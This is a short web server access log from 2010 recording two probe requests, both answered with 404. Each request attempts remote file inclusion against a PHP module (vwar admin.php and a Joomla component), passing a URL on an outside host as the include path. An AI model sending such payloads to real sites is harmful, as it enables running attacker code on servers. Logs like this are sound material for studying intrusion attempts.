208.98.1.242 - - [28/Feb/2010:17:28:55 -0800] "GET /logs/access_100104.log//modules/vwar/admin/admin.php?vwar_root=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:29:33 -0800] "GET /logs/access_100104.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
